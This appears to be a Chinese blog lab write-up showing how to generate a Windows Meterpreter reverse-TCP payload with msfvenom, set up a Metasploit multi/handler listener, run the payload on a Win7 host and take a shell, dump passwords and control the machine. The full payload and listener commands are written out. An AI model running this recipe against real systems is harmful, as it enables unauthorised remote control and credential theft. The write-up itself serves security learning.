利用windows恶意软件获取windows主机shell

该实验模拟了黑客如何使用msfvenom工具生成恶意软件,通过reverse_tcp连接获取Windows主机的shell权限。在Kali系统中,设置监听模块后,将exe文件拷贝到目标Windows主机并执行,成功监控到程序运行,从而进行后渗透操作,如获取密码和控制系统功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • 实验目的:
    • 模拟黑客利用windows恶意软件获取windows主机shell权限的过程
    • 熟悉操作使用的命令
  • 实验准备:
    • kali
    • 同网段的windows主机(关闭防火墙)
    • msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。
  • 实验内容:
    • 制作Windows恶意软件获取shell \
    • msfvenom的shell在windows中的使用
    • msfvenom生成shell.exe
  • 实验步骤
    • 制造恶意程序文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.24.131 LPORT=6060 -f exe

    • 出现载荷与exe文件大小表示成功了
    • 切换到相应界面,查看exe文件

    • 回到kali命令窗口
    • 进入msf控制台 :msfconsole

    • 使用侦听模块设置侦听(加载模块,设置载荷和参数)
      • use exploit/multi/handler
      • set payload windows/meterpreter/reverse_tcp
      • set lhost 192.168.24.131
      • set lport 6060
    • 如图

    • exploit 运行

    • 将之前生成exe运行文件拷贝到win7系统中,并运行

    • 返回kali发现程序的运行已经被监控到,如图

    • 通过meterpreter进行后渗透操作,例如获取密码

    • 获取shell

    • 打开百度以及弹出计算器

    • 效果如图

  • 记录网络安全学习过程,希望能提高大家的安全意识。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值